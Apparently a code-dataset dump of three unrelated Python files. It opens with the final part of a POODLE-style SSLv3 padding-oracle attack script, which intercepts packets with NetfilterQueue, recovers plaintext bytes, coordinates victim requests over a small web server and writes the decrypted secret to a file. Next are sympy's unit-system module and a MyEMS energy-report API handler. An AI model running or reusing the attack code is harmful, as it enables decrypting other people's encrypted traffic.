decrypted_byte = (block_size - 1) ^ previous_block_last_byte ^ last_block_last_byte
decrypted_byte_index = ((block_to_move + 1) * block_size) - current_offset - 1
# Store what was learned
secret[decrypted_byte_index] = decrypted_byte
if decrypted_byte_index == ciphertext_length - 1:
log_result_and_end()
# Reset all sessions
sessions = {}
print_state(len(ciphertext), "{} = {} ^ {} ^ {}".format(decrypted_byte, block_size - 1, previous_block_last_byte, last_block_last_byte))
else:
log("ciphertext is None")
else:
log("TLS Type: {}".format(get_field(pkt.getlayer(TLS), 'type')))
# Try to get server IP address from the dns name given in the config file and the DNS traffic we've intercepted
elif server_ip is None and pkt.dst == config['target'] and DNS in pkt:
resource = pkt[DNS]['DNS Resource Record']
while resource is not None:
dns_mapping[get_field(resource, 'rrname')] = get_field(resource, 'rdata')
if 'DNS Resource Record' in resource.payload:
resource = resource.payload['DNS Resource Record']
else:
resource = None
track = config['server']
while not track.replace('.', '').isnumeric() and track in dns_mapping:
track = dns_mapping[track]
if track.replace('.', '').isnumeric():
server_ip = track
pass
# parse DNS response and get server_ip
packet.accept()
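    # Worked recovery math behind the XOR in callback() above (illustrative note,
    # not part of the original script). In SSLv3 CBC the last plaintext byte of
    # the final (padding) block must decrypt to block_size - 1 for the record to
    # be accepted. Because the final ciphertext block was replaced with a copy of
    # the target block C_i, acceptance implies:
    #     block_size - 1 = D(C_i)[-1] XOR C_{n-1}[-1]
    # while normal CBC decryption of the original block gives:
    #     P_i[-1] = D(C_i)[-1] XOR C_{i-1}[-1]
    # so the recovered plaintext byte is:
    #     P_i[-1] = (block_size - 1) XOR C_{n-1}[-1] XOR C_{i-1}[-1]
    # which is exactly: decrypted_byte = (block_size - 1) ^
    #     previous_block_last_byte ^ last_block_last_byte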
class Handler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
log(format.format(*args))
def add_headers(self):
self.send_header("Content-type", "text/plain")
self.send_header('Access-Control-Allow-Origin', '*')
def do_GET(self):
global block_size
global data_padding_size_needed
global current_offset
global block_to_move
global number_of_requests
content = None
            while block_size is None:
time.sleep(0.1)
if self.path == '/blocksize':
output_list[0] = 'Finding Block Size...'
content = bytes(str(block_size) + " " + str(int(data_padding_size_needed + 1)), 'utf8')
elif self.path == '/offset':
for i in range(block_size):
if ((block_to_move + 1) * block_size) - i - 1 not in secret:
current_offset = i
content = bytes(str(i), 'utf8')
break
                if content is None:
block_to_move += 1
current_offset = 0
content = bytes('0', 'utf8')
number_of_requests[get_current_index()] = 0
else:
self.send_error(404, "Endpoint does not exist")
return
self.send_response(200)
self.send_header('Content-Length', len(content))
self.add_headers()
self.end_headers()
self.wfile.write(content)
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
web_server = ThreadingSimpleServer(('0.0.0.0', 80), Handler)
web_server_thread = threading.Thread(target=web_server.serve_forever)
nfqueue = NetfilterQueue()
nfqueue.bind(0, callback)
# Called when entire request is decrypted
def log_result_and_end():
global secret
global ciphertext_length
plaintext = repr(''.join([ chr(secret[i]) if i in secret else '.' for i in range(ciphertext_length) ]))
out_file = open('plaintext.txt', 'w')
out_file.write(plaintext)
out_file.close()
nfqueue.unbind()
web_server.shutdown()
web_server_thread.join()
log_file.close()
os._exit(0)
try:
web_server_thread.start()
nfqueue.run()
except KeyboardInterrupt:
pass
nfqueue.unbind()
web_server.shutdown()
web_server_thread.join()
log_file.close()
| avg_line_length: 34.347222 | max_line_length: 267 | alphanum_fraction: 0.692479 |
| hexsha: b196a017198db70c3222bb5f4ebd5b1d3745f0fb | size: 7,453 | ext: py | lang: Python | path: sympy/physics/units/unitsystem.py | repo: bigfooted/sympy | repo_head_hexsha: 1fb2490fa2fa9b476da450f02a25b03c1dc07cf0 | licenses: ["BSD-3-Clause"] | stars: 603 (2020-12-23T13:49:32.000Z to 2022-03-31T23:38:03.000Z) | issues: 387 (2020-12-15T14:54:04.000Z to 2022-03-31T07:00:21.000Z) | forks: 35 (2021-03-26T03:12:04.000Z to 2022-03-23T10:15:10.000Z) |
"""
Unit system for physical quantities; include definition of constants.
"""
from typing import Dict
from sympy import S, Mul, Pow, Add, Function, Derivative
from sympy.physics.units.dimensions import _QuantityMapper
from sympy.utilities.exceptions import SymPyDeprecationWarning
from .dimensions import Dimension
class UnitSystem(_QuantityMapper):
"""
UnitSystem represents a coherent set of units.
A unit system is basically a dimension system with notions of scales. Many
of the methods are defined in the same way.
It is much better if all base units have a symbol.
"""
_unit_systems = {} # type: Dict[str, UnitSystem]
def __init__(self, base_units, units=(), name="", descr="", dimension_system=None):
UnitSystem._unit_systems[name] = self
self.name = name
self.descr = descr
self._base_units = base_units
self._dimension_system = dimension_system
self._units = tuple(set(base_units) | set(units))
self._base_units = tuple(base_units)
super().__init__()
def __str__(self):
"""
Return the name of the system.
If it does not exist, then it makes a list of symbols (or names) of
the base dimensions.
"""
if self.name != "":
return self.name
else:
return "UnitSystem((%s))" % ", ".join(
str(d) for d in self._base_units)
def __repr__(self):
return '<UnitSystem: %s>' % repr(self._base_units)
def extend(self, base, units=(), name="", description="", dimension_system=None):
"""Extend the current system into a new one.
Take the base and normal units of the current system to merge
them to the base and normal units given in argument.
If not provided, name and description are overridden by empty strings.
"""
base = self._base_units + tuple(base)
units = self._units + tuple(units)
return UnitSystem(base, units, name, description, dimension_system)
def print_unit_base(self, unit):
"""
Useless method.
DO NOT USE, use instead ``convert_to``.
Give the string expression of a unit in term of the basis.
Units are displayed by decreasing power.
"""
SymPyDeprecationWarning(
deprecated_since_version="1.2",
issue=13336,
feature="print_unit_base",
useinstead="convert_to",
).warn()
from sympy.physics.units import convert_to
return convert_to(unit, self._base_units)
def get_dimension_system(self):
return self._dimension_system
def get_quantity_dimension(self, unit):
qdm = self.get_dimension_system()._quantity_dimension_map
if unit in qdm:
return qdm[unit]
return super().get_quantity_dimension(unit)
def get_quantity_scale_factor(self, unit):
qsfm = self.get_dimension_system()._quantity_scale_factors
if unit in qsfm:
return qsfm[unit]
return super().get_quantity_scale_factor(unit)
@staticmethod
def get_unit_system(unit_system):
if isinstance(unit_system, UnitSystem):
return unit_system
if unit_system not in UnitSystem._unit_systems:
raise ValueError(
"Unit system is not supported. Currently"
"supported unit systems are {}".format(
", ".join(sorted(UnitSystem._unit_systems))
)
)
return UnitSystem._unit_systems[unit_system]
@staticmethod
def get_default_unit_system():
return UnitSystem._unit_systems["SI"]
@property
def dim(self):
"""
Give the dimension of the system.
That is return the number of units forming the basis.
"""
return len(self._base_units)
@property
def is_consistent(self):
"""
Check if the underlying dimension system is consistent.
"""
# test is performed in DimensionSystem
return self.get_dimension_system().is_consistent
def get_dimensional_expr(self, expr):
from sympy import Mul, Add, Pow, Derivative
from sympy import Function
from sympy.physics.units import Quantity
if isinstance(expr, Mul):
return Mul(*[self.get_dimensional_expr(i) for i in expr.args])
elif isinstance(expr, Pow):
return self.get_dimensional_expr(expr.base) ** expr.exp
elif isinstance(expr, Add):
return self.get_dimensional_expr(expr.args[0])
elif isinstance(expr, Derivative):
dim = self.get_dimensional_expr(expr.expr)
for independent, count in expr.variable_count:
dim /= self.get_dimensional_expr(independent)**count
return dim
elif isinstance(expr, Function):
args = [self.get_dimensional_expr(arg) for arg in expr.args]
if all(i == 1 for i in args):
return S.One
return expr.func(*args)
elif isinstance(expr, Quantity):
return self.get_quantity_dimension(expr).name
return S.One
def _collect_factor_and_dimension(self, expr):
"""
Return tuple with scale factor expression and dimension expression.
"""
from sympy.physics.units import Quantity
if isinstance(expr, Quantity):
return expr.scale_factor, expr.dimension
elif isinstance(expr, Mul):
factor = 1
dimension = Dimension(1)
for arg in expr.args:
arg_factor, arg_dim = self._collect_factor_and_dimension(arg)
factor *= arg_factor
dimension *= arg_dim
return factor, dimension
elif isinstance(expr, Pow):
factor, dim = self._collect_factor_and_dimension(expr.base)
exp_factor, exp_dim = self._collect_factor_and_dimension(expr.exp)
if exp_dim.is_dimensionless:
exp_dim = 1
return factor ** exp_factor, dim ** (exp_factor * exp_dim)
elif isinstance(expr, Add):
factor, dim = self._collect_factor_and_dimension(expr.args[0])
for addend in expr.args[1:]:
addend_factor, addend_dim = \
self._collect_factor_and_dimension(addend)
if dim != addend_dim:
raise ValueError(
'Dimension of "{}" is {}, '
'but it should be {}'.format(
addend, addend_dim, dim))
factor += addend_factor
return factor, dim
elif isinstance(expr, Derivative):
factor, dim = self._collect_factor_and_dimension(expr.args[0])
for independent, count in expr.variable_count:
ifactor, idim = self._collect_factor_and_dimension(independent)
factor /= ifactor**count
dim /= idim**count
return factor, dim
elif isinstance(expr, Function):
fds = [self._collect_factor_and_dimension(
arg) for arg in expr.args]
return (expr.func(*(f[0] for f in fds)),
expr.func(*(d[1] for d in fds)))
elif isinstance(expr, Dimension):
return 1, expr
else:
return expr, Dimension(1)
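# Illustrative usage sketch (not part of the original module); it assumes the SI
# unit system and quantities from sympy.physics.units, and is kept as a comment
# to avoid import-time side effects:
#
#     from sympy.physics.units import meter, second
#     from sympy.physics.units.systems import SI
#     SI.get_dimensional_expr(meter / second)       # -> length/time
#     SI._collect_factor_and_dimension(10 * meter)  # -> (10, Dimension(length))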
| avg_line_length: 34.827103 | max_line_length: 87 | alphanum_fraction: 0.60687 |
| hexsha: 1a34f03bbba8df71b7cea655adbb586f11244888 | size: 37,333 | ext: py | lang: Python | path: myems-api/reports/spacestatistics.py | repo: hyh123a/myems | repo_head_hexsha: 669ab8554995a622da595384698d670f9cee61f8 | licenses: ["MIT"] | stars: 1 (2021-08-04T13:41:45.000Z to 2021-08-04T13:41:45.000Z) | issues: null | forks: null |
import falcon
import simplejson as json
import mysql.connector
import config
from datetime import datetime, timedelta, timezone
from core import utilities
from decimal import Decimal
import excelexporters.spacestatistics
class Reporting:
@staticmethod
def __init__():
pass
@staticmethod
def on_options(req, resp):
resp.status = falcon.HTTP_200
####################################################################################################################
# PROCEDURES
# Step 1: valid parameters
# Step 2: query the space
# Step 3: query energy categories
# Step 4: query associated sensors
# Step 5: query associated points
# Step 6: query base period energy input
# Step 7: query reporting period energy input
# Step 8: query tariff data
# Step 9: query associated sensors and points data
# Step 10: construct the report
####################################################################################################################
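    # Illustrative request sketch (not part of the original handler); the query
    # parameter names are the ones read in on_get() below, while the route path
    # and parameter values are made-up assumptions:
    #   GET /reports/spacestatistics?spaceid=1&periodtype=daily
    #       &baseperiodstartdatetime=2020-01-01T00:00:00
    #       &baseperiodenddatetime=2020-02-01T00:00:00
    #       &reportingperiodstartdatetime=2020-02-01T00:00:00
    #       &reportingperiodenddatetime=2020-03-01T00:00:00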
@staticmethod
def on_get(req, resp):
print(req.params)
space_id = req.params.get('spaceid')
period_type = req.params.get('periodtype')
base_start_datetime_local = req.params.get('baseperiodstartdatetime')
base_end_datetime_local = req.params.get('baseperiodenddatetime')
reporting_start_datetime_local = req.params.get('reportingperiodstartdatetime')
reporting_end_datetime_local = req.params.get('reportingperiodenddatetime')
################################################################################################################
# Step 1: valid parameters
################################################################################################################
if space_id is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_SPACE_ID')
else:
space_id = str.strip(space_id)
if not space_id.isdigit() or int(space_id) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_SPACE_ID')
if period_type is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_PERIOD_TYPE')
else:
period_type = str.strip(period_type)
if period_type not in ['hourly', 'daily', 'monthly', 'yearly']:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_PERIOD_TYPE')
timezone_offset = int(config.utc_offset[1:3]) * 60 + int(config.utc_offset[4:6])
if config.utc_offset[0] == '-':
timezone_offset = -timezone_offset
base_start_datetime_utc = None
if base_start_datetime_local is not None and len(str.strip(base_start_datetime_local)) > 0:
base_start_datetime_local = str.strip(base_start_datetime_local)
try:
base_start_datetime_utc = datetime.strptime(base_start_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_BASE_PERIOD_START_DATETIME")
base_end_datetime_utc = None
if base_end_datetime_local is not None and len(str.strip(base_end_datetime_local)) > 0:
base_end_datetime_local = str.strip(base_end_datetime_local)
try:
base_end_datetime_utc = datetime.strptime(base_end_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_BASE_PERIOD_END_DATETIME")
if base_start_datetime_utc is not None and base_end_datetime_utc is not None and \
base_start_datetime_utc >= base_end_datetime_utc:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_BASE_PERIOD_END_DATETIME')
if reporting_start_datetime_local is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_START_DATETIME")
else:
reporting_start_datetime_local = str.strip(reporting_start_datetime_local)
try:
reporting_start_datetime_utc = datetime.strptime(reporting_start_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_START_DATETIME")
if reporting_end_datetime_local is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_END_DATETIME")
else:
reporting_end_datetime_local = str.strip(reporting_end_datetime_local)
try:
reporting_end_datetime_utc = datetime.strptime(reporting_end_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_END_DATETIME")
if reporting_start_datetime_utc >= reporting_end_datetime_utc:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_REPORTING_PERIOD_END_DATETIME')
################################################################################################################
# Step 2: query the space
################################################################################################################
cnx_system = mysql.connector.connect(**config.myems_system_db)
cursor_system = cnx_system.cursor()
cnx_energy = mysql.connector.connect(**config.myems_energy_db)
cursor_energy = cnx_energy.cursor()
cnx_historical = mysql.connector.connect(**config.myems_historical_db)
cursor_historical = cnx_historical.cursor()
cursor_system.execute(" SELECT id, name, area, cost_center_id "
" FROM tbl_spaces "
" WHERE id = %s ", (space_id,))
row_space = cursor_system.fetchone()
if row_space is None:
if cursor_system:
cursor_system.close()
if cnx_system:
cnx_system.disconnect()
if cursor_energy:
cursor_energy.close()
if cnx_energy:
cnx_energy.disconnect()
            if cursor_historical:
                cursor_historical.close()
            if cnx_historical:
                cnx_historical.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND', description='API.SPACE_NOT_FOUND')
space = dict()
space['id'] = row_space[0]
space['name'] = row_space[1]
space['area'] = row_space[2]
space['cost_center_id'] = row_space[3]
################################################################################################################
# Step 3: query energy categories
################################################################################################################
energy_category_set = set()
# query energy categories in base period
cursor_energy.execute(" SELECT DISTINCT(energy_category_id) "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s ",
(space['id'], base_start_datetime_utc, base_end_datetime_utc))
rows_energy_categories = cursor_energy.fetchall()
        if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row_energy_category in rows_energy_categories:
energy_category_set.add(row_energy_category[0])
# query energy categories in reporting period
cursor_energy.execute(" SELECT DISTINCT(energy_category_id) "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s ",
(space['id'], reporting_start_datetime_utc, reporting_end_datetime_utc))
rows_energy_categories = cursor_energy.fetchall()
        if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row_energy_category in rows_energy_categories:
energy_category_set.add(row_energy_category[0])
# query all energy categories in base period and reporting period
cursor_system.execute(" SELECT id, name, unit_of_measure, kgce, kgco2e "
" FROM tbl_energy_categories "
" ORDER BY id ", )
rows_energy_categories = cursor_system.fetchall()
if rows_energy_categories is None or len(rows_energy_categories) == 0:
if cursor_system:
cursor_system.close()
if cnx_system:
cnx_system.disconnect()
if cursor_energy:
cursor_energy.close()
if cnx_energy:
cnx_energy.disconnect()
            if cursor_historical:
                cursor_historical.close()
            if cnx_historical:
                cnx_historical.disconnect()
raise falcon.HTTPError(falcon.HTTP_404,
title='API.NOT_FOUND',
description='API.ENERGY_CATEGORY_NOT_FOUND')
energy_category_dict = dict()
for row_energy_category in rows_energy_categories:
if row_energy_category[0] in energy_category_set:
energy_category_dict[row_energy_category[0]] = {"name": row_energy_category[1],
"unit_of_measure": row_energy_category[2],
"kgce": row_energy_category[3],
"kgco2e": row_energy_category[4]}
################################################################################################################
# Step 4: query associated sensors
################################################################################################################
point_list = list()
cursor_system.execute(" SELECT po.id, po.name, po.units, po.object_type "
" FROM tbl_spaces sp, tbl_sensors se, tbl_spaces_sensors spse, "
" tbl_points po, tbl_sensors_points sepo "
" WHERE sp.id = %s AND sp.id = spse.space_id AND spse.sensor_id = se.id "
" AND se.id = sepo.sensor_id AND sepo.point_id = po.id "
" ORDER BY po.id ", (space['id'], ))
rows_points = cursor_system.fetchall()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_list.append({"id": row[0], "name": row[1], "units": row[2], "object_type": row[3]})
################################################################################################################
# Step 5: query associated points
################################################################################################################
cursor_system.execute(" SELECT po.id, po.name, po.units, po.object_type "
" FROM tbl_spaces sp, tbl_spaces_points sppo, tbl_points po "
" WHERE sp.id = %s AND sp.id = sppo.space_id AND sppo.point_id = po.id "
" ORDER BY po.id ", (space['id'], ))
rows_points = cursor_system.fetchall()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_list.append({"id": row[0], "name": row[1], "units": row[2], "object_type": row[3]})
################################################################################################################
# Step 6: query base period energy input
################################################################################################################
base = dict()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
base[energy_category_id] = dict()
base[energy_category_id]['timestamps'] = list()
base[energy_category_id]['values'] = list()
base[energy_category_id]['subtotal'] = Decimal(0.0)
base[energy_category_id]['mean'] = None
base[energy_category_id]['median'] = None
base[energy_category_id]['minimum'] = None
base[energy_category_id]['maximum'] = None
base[energy_category_id]['stdev'] = None
base[energy_category_id]['variance'] = None
cursor_energy.execute(" SELECT start_datetime_utc, actual_value "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND energy_category_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s "
" ORDER BY start_datetime_utc ",
(space['id'],
energy_category_id,
base_start_datetime_utc,
base_end_datetime_utc))
rows_space_hourly = cursor_energy.fetchall()
rows_space_periodically, \
base[energy_category_id]['mean'], \
base[energy_category_id]['median'], \
base[energy_category_id]['minimum'], \
base[energy_category_id]['maximum'], \
base[energy_category_id]['stdev'], \
base[energy_category_id]['variance'] = \
utilities.statistics_hourly_data_by_period(rows_space_hourly,
base_start_datetime_utc,
base_end_datetime_utc,
period_type)
for row_space_periodically in rows_space_periodically:
current_datetime_local = row_space_periodically[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
if period_type == 'hourly':
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
elif period_type == 'daily':
current_datetime = current_datetime_local.strftime('%Y-%m-%d')
elif period_type == 'monthly':
current_datetime = current_datetime_local.strftime('%Y-%m')
elif period_type == 'yearly':
current_datetime = current_datetime_local.strftime('%Y')
actual_value = Decimal(0.0) if row_space_periodically[1] is None else row_space_periodically[1]
base[energy_category_id]['timestamps'].append(current_datetime)
base[energy_category_id]['values'].append(actual_value)
base[energy_category_id]['subtotal'] += actual_value
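# Illustration only (hypothetical values): at this point each base[energy_category_id] looks like
# {'timestamps': ['2023-01-01T00:00:00', ...], 'values': [Decimal('12.3'), ...], 'subtotal': Decimal('345.6'),
#  'mean': ..., 'median': ..., 'minimum': ..., 'maximum': ..., 'stdev': ..., 'variance': ...}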
################################################################################################################
# Step 7: query reporting period energy input
################################################################################################################
reporting = dict()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
reporting[energy_category_id] = dict()
reporting[energy_category_id]['timestamps'] = list()
reporting[energy_category_id]['values'] = list()
reporting[energy_category_id]['subtotal'] = Decimal(0.0)
reporting[energy_category_id]['mean'] = None
reporting[energy_category_id]['median'] = None
reporting[energy_category_id]['minimum'] = None
reporting[energy_category_id]['maximum'] = None
reporting[energy_category_id]['stdev'] = None
reporting[energy_category_id]['variance'] = None
cursor_energy.execute(" SELECT start_datetime_utc, actual_value "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND energy_category_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s "
" ORDER BY start_datetime_utc ",
(space['id'],
energy_category_id,
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows_space_hourly = cursor_energy.fetchall()
rows_space_periodically, \
reporting[energy_category_id]['mean'], \
reporting[energy_category_id]['median'], \
reporting[energy_category_id]['minimum'], \
reporting[energy_category_id]['maximum'], \
reporting[energy_category_id]['stdev'], \
reporting[energy_category_id]['variance'] = \
utilities.statistics_hourly_data_by_period(rows_space_hourly,
reporting_start_datetime_utc,
reporting_end_datetime_utc,
period_type)
for row_space_periodically in rows_space_periodically:
current_datetime_local = row_space_periodically[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
if period_type == 'hourly':
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
elif period_type == 'daily':
current_datetime = current_datetime_local.strftime('%Y-%m-%d')
elif period_type == 'monthly':
current_datetime = current_datetime_local.strftime('%Y-%m')
elif period_type == 'yearly':
current_datetime = current_datetime_local.strftime('%Y')
actual_value = Decimal(0.0) if row_space_periodically[1] is None else row_space_periodically[1]
reporting[energy_category_id]['timestamps'].append(current_datetime)
reporting[energy_category_id]['values'].append(actual_value)
reporting[energy_category_id]['subtotal'] += actual_value
################################################################################################################
# Step 8: query tariff data
################################################################################################################
parameters_data = dict()
parameters_data['names'] = list()
parameters_data['timestamps'] = list()
parameters_data['values'] = list()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
energy_category_tariff_dict = utilities.get_energy_category_tariffs(space['cost_center_id'],
energy_category_id,
reporting_start_datetime_utc,
reporting_end_datetime_utc)
tariff_timestamp_list = list()
tariff_value_list = list()
for k, v in energy_category_tariff_dict.items():
# convert k from utc to local
k = k + timedelta(minutes=timezone_offset)
                tariff_timestamp_list.append(k.isoformat()[0:19])
tariff_value_list.append(v)
parameters_data['names'].append('TARIFF-' + energy_category_dict[energy_category_id]['name'])
parameters_data['timestamps'].append(tariff_timestamp_list)
parameters_data['values'].append(tariff_value_list)
################################################################################################################
# Step 9: query associated sensors and points data
################################################################################################################
for point in point_list:
point_values = []
point_timestamps = []
if point['object_type'] == 'ANALOG_VALUE':
query = (" SELECT utc_date_time, actual_value "
" FROM tbl_analog_value "
" WHERE point_id = %s "
" AND utc_date_time BETWEEN %s AND %s "
" ORDER BY utc_date_time ")
cursor_historical.execute(query, (point['id'],
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows = cursor_historical.fetchall()
if rows is not None and len(rows) > 0:
for row in rows:
current_datetime_local = row[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
point_timestamps.append(current_datetime)
point_values.append(row[1])
elif point['object_type'] == 'ENERGY_VALUE':
query = (" SELECT utc_date_time, actual_value "
" FROM tbl_energy_value "
" WHERE point_id = %s "
" AND utc_date_time BETWEEN %s AND %s "
" ORDER BY utc_date_time ")
cursor_historical.execute(query, (point['id'],
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows = cursor_historical.fetchall()
if rows is not None and len(rows) > 0:
for row in rows:
current_datetime_local = row[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
point_timestamps.append(current_datetime)
point_values.append(row[1])
elif point['object_type'] == 'DIGITAL_VALUE':
query = (" SELECT utc_date_time, actual_value "
" FROM tbl_digital_value "
" WHERE point_id = %s "
" AND utc_date_time BETWEEN %s AND %s ")
cursor_historical.execute(query, (point['id'],
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows = cursor_historical.fetchall()
if rows is not None and len(rows) > 0:
for row in rows:
current_datetime_local = row[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
point_timestamps.append(current_datetime)
point_values.append(row[1])
parameters_data['names'].append(point['name'] + ' (' + point['units'] + ')')
parameters_data['timestamps'].append(point_timestamps)
parameters_data['values'].append(point_values)
################################################################################################################
# Step 10: construct the report
################################################################################################################
if cursor_system:
            cursor_system.close()
if cnx_system:
            cnx_system.disconnect()
if cursor_energy:
            cursor_energy.close()
if cnx_energy:
            cnx_energy.disconnect()
if cursor_historical:
            cursor_historical.close()
if cnx_historical:
            cnx_historical.disconnect()
result = dict()
result['space'] = dict()
result['space']['name'] = space['name']
result['space']['area'] = space['area']
result['base_period'] = dict()
result['base_period']['names'] = list()
result['base_period']['units'] = list()
result['base_period']['timestamps'] = list()
result['base_period']['values'] = list()
result['base_period']['subtotals'] = list()
result['base_period']['means'] = list()
result['base_period']['medians'] = list()
result['base_period']['minimums'] = list()
result['base_period']['maximums'] = list()
result['base_period']['stdevs'] = list()
result['base_period']['variances'] = list()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
result['base_period']['names'].append(energy_category_dict[energy_category_id]['name'])
result['base_period']['units'].append(energy_category_dict[energy_category_id]['unit_of_measure'])
result['base_period']['timestamps'].append(base[energy_category_id]['timestamps'])
result['base_period']['values'].append(base[energy_category_id]['values'])
result['base_period']['subtotals'].append(base[energy_category_id]['subtotal'])
result['base_period']['means'].append(base[energy_category_id]['mean'])
result['base_period']['medians'].append(base[energy_category_id]['median'])
result['base_period']['minimums'].append(base[energy_category_id]['minimum'])
result['base_period']['maximums'].append(base[energy_category_id]['maximum'])
result['base_period']['stdevs'].append(base[energy_category_id]['stdev'])
result['base_period']['variances'].append(base[energy_category_id]['variance'])
result['reporting_period'] = dict()
result['reporting_period']['names'] = list()
result['reporting_period']['energy_category_ids'] = list()
result['reporting_period']['units'] = list()
result['reporting_period']['timestamps'] = list()
result['reporting_period']['values'] = list()
result['reporting_period']['subtotals'] = list()
result['reporting_period']['means'] = list()
result['reporting_period']['means_per_unit_area'] = list()
result['reporting_period']['means_increment_rate'] = list()
result['reporting_period']['medians'] = list()
result['reporting_period']['medians_per_unit_area'] = list()
result['reporting_period']['medians_increment_rate'] = list()
result['reporting_period']['minimums'] = list()
result['reporting_period']['minimums_per_unit_area'] = list()
result['reporting_period']['minimums_increment_rate'] = list()
result['reporting_period']['maximums'] = list()
result['reporting_period']['maximums_per_unit_area'] = list()
result['reporting_period']['maximums_increment_rate'] = list()
result['reporting_period']['stdevs'] = list()
result['reporting_period']['stdevs_per_unit_area'] = list()
result['reporting_period']['stdevs_increment_rate'] = list()
result['reporting_period']['variances'] = list()
result['reporting_period']['variances_per_unit_area'] = list()
result['reporting_period']['variances_increment_rate'] = list()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
result['reporting_period']['names'].append(energy_category_dict[energy_category_id]['name'])
result['reporting_period']['energy_category_ids'].append(energy_category_id)
result['reporting_period']['units'].append(energy_category_dict[energy_category_id]['unit_of_measure'])
result['reporting_period']['timestamps'].append(reporting[energy_category_id]['timestamps'])
result['reporting_period']['values'].append(reporting[energy_category_id]['values'])
result['reporting_period']['subtotals'].append(reporting[energy_category_id]['subtotal'])
result['reporting_period']['means'].append(reporting[energy_category_id]['mean'])
result['reporting_period']['means_per_unit_area'].append(
reporting[energy_category_id]['mean'] / space['area']
if reporting[energy_category_id]['mean'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['means_increment_rate'].append(
(reporting[energy_category_id]['mean'] - base[energy_category_id]['mean']) /
base[energy_category_id]['mean'] if (base[energy_category_id]['mean'] is not None and
base[energy_category_id]['mean'] > Decimal(0.0))
else None)
result['reporting_period']['medians'].append(reporting[energy_category_id]['median'])
result['reporting_period']['medians_per_unit_area'].append(
reporting[energy_category_id]['median'] / space['area']
if reporting[energy_category_id]['median'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['medians_increment_rate'].append(
(reporting[energy_category_id]['median'] - base[energy_category_id]['median']) /
base[energy_category_id]['median'] if (base[energy_category_id]['median'] is not None and
base[energy_category_id]['median'] > Decimal(0.0))
else None)
result['reporting_period']['minimums'].append(reporting[energy_category_id]['minimum'])
result['reporting_period']['minimums_per_unit_area'].append(
reporting[energy_category_id]['minimum'] / space['area']
if reporting[energy_category_id]['minimum'] is not None and
space['area'] is not None and space['area'] > Decimal(0.0)
else None)
result['reporting_period']['minimums_increment_rate'].append(
(reporting[energy_category_id]['minimum'] - base[energy_category_id]['minimum']) /
base[energy_category_id]['minimum'] if (base[energy_category_id]['minimum'] is not None and
base[energy_category_id]['minimum'] > Decimal(0.0))
else None)
